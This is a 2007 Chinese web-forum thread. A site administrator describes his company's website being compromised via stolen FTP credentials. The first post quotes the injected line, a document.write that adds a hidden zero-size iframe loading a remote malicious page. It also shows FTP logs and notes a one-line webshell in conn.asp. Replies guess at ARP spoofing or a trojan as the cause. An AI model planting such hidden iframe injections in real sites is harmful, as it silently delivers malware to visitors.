设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
海浩社区»论坛 站务管理区 版主事务交流版 出来混,迟早要还,公司的网站被挂马了~~~ ...
返回列表 发新帖
查看: 112|回复: 5

出来混,迟早要还,公司的网站被挂马了~~~

[复制链接]
coolfax

1678

主题

5167

回帖

9302

积分

荣誉版主

沉痛悼念小于……

积分
9302
发表于 2007-5-21 13:50:15 | 显示全部楼层 |阅读模式
今天一早上班,同事们的江民杀毒、卡巴斯基、mcafee 8.0都报警,在我们公司的网站上发现了恶意代码

但是我的mcafee 8.5倒是安静得很

经过检查,发现服务器上很多JS文件被修改了。修改时间是2007-5-18 13点左右。
js最后一句被植入了

document.write("<iframe src=\"http://s.gcuj.com/bd.htm?1043\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");

我靠~~~ 实在是太过分了!

经过检查,被植入恶意代码的网页分别是:首页的index.js,新闻的common.js,论坛的header.asp,投票的conn.asp

检查服务器上面的日志,发现5月18号的记录很少,只有几条,估计是被删除了。
再检查FTP(用的是sonicFTP)的日志,终于发现5月18号那天的重要线索了:

12:49:35 221.233.104.67 [202]Logon - hotelbuy
12:50:11 221.233.104.67 [202]开始接受文件
12:50:11 221.233.104.67 [202]RECV E:\hotelbuy\index.asa 150
12:50:11 221.233.104.67 [202]SAVEUP hotelbuy 180
12:50:11 221.233.104.67 [202]SAVEUP hotelbuy ok
12:50:11 221.233.104.67 [202]VerifyFileSFV - E:\hotelbuy\index.asa
12:56:09 221.233.104.67 [202]开始传送文件
12:56:09 221.233.104.67 [202]SEND E:\hotelbuy\vote\conn.asp 150
12:56:09 221.233.104.67 [202]SAVEDOWN hotelbuy 3674
12:56:09 221.233.104.67 [202]SAVEDOWN hotelbuy ok
12:56:59 221.233.104.67 [202]开始接受文件
12:56:59 221.233.104.67 [202]RECV E:\hotelbuy\vote\conn.asp 150
12:57:00 221.233.104.67 [202]SAVEUP hotelbuy 3699
12:57:00 221.233.104.67 [202]SAVEUP hotelbuy ok
12:57:00 221.233.104.67 [202]VerifyFileSFV - E:\hotelbuy\vote\conn.asp
12:58:56 221.233.104.67 [202]EXIT - 0

说明木马不是通过SQL注入实现的,而且黑客直接得到了FTP密码,甚至是服务器密码。
221.233.104.67 这个IP ,是来自湖北省宜昌市

其中投票的conn.asp里面加的是“一句话木马”

而gcuj.com这个网站IP是:60.190.114.227 来自浙江省温州市
域名应该是在万网注册的

分析:黑客是怎么入侵服务器的?

黑客是通过FTP进行文件修改的,说明他拥有网站FTP的密码。问题是:sonicFTP的站点密码是经过MD5加密的,而且密码也足够复杂,密码只有我一个人知道,他是怎么知道密码的?


  实在头痛啊~~~~哪位达人熟悉的出来给点意见,看看应该从哪里入手检查?
人似秋鸿来有信,事如春梦了无痕
回复

使用道具 举报

发表于 2007-5-21 15:20:47 | 显示全部楼层
既然密码只有你一个人知道,而且同事的防毒软件报警而你的却不报,我看还是从你自己的机器入手检查,我觉得你的机器狠有可能中了招才导致密码泄露
知道自己能够知道的
放弃自己无法知道的
享受自己能够享受的
愤怒于被允许愤怒的
回复

使用道具 举报

coolfax

1678

主题

5167

回帖

9302

积分

荣誉版主

沉痛悼念小于……

积分
9302
 楼主| 发表于 2007-5-21 16:38:47 | 显示全部楼层
我的电脑已经更换了杀毒软件进行查杀,没发现可疑
初步怀疑了电信机房其它服务器被安装了嗅觉器,然后对其他服务器进行ARP欺骗获得FTP密码

下午把FTP服务器换成了Serv-U
并且设定只能使用SSL连接
希望能加强安全性
人似秋鸿来有信,事如春梦了无痕
回复

使用道具 举报

发表于 2007-5-21 22:51:00 | 显示全部楼层
原帖由 coolfax 于 2007-5-21 16:38 发表
我的电脑已经更换了杀毒软件进行查杀,没发现可疑
初步怀疑了电信机房其它服务器被安装了嗅觉器,然后对其他服务器进行ARP欺骗获得FTP密码

下午把FTP服务器换成了Serv-U
并且设定只能使用SSL连接
希望能加 ...

可能是这样盗得的密码吧,可是为什么你同事的防火墙报警而你的电脑却没动静呢?
知道自己能够知道的
放弃自己无法知道的
享受自己能够享受的
愤怒于被允许愤怒的
回复

使用道具 举报

ccjjy2k

259

主题

1091

回帖

1773

积分

荣誉版主

积分
1773
发表于 2007-5-22 22:27:05 | 显示全部楼层
估计楼主的机器成了"肉鸡",被灰鸽子盯上了
欢迎来偶的博客坐坐:
http://www.mtime.com/my/ccjjy2k
回复

使用道具 举报

coolfax

1678

主题

5167

回帖

9302

积分

荣誉版主

沉痛悼念小于……

积分
9302
 楼主| 发表于 2007-5-23 08:53:02 | 显示全部楼层
原帖由 甘之若饴 于 2007-5-21 22:51 发表

可能是这样盗得的密码吧,可是为什么你同事的防火墙报警而你的电脑却没动静呢?


那只能怪mcafee 8.5有问题~~~~;01

人家的mcafee 8.0都报警了~~
人似秋鸿来有信,事如春梦了无痕
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|海浩社区

GMT+8, 2025-9-15 15:32 , Processed in 0.084463 second(s), 21 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表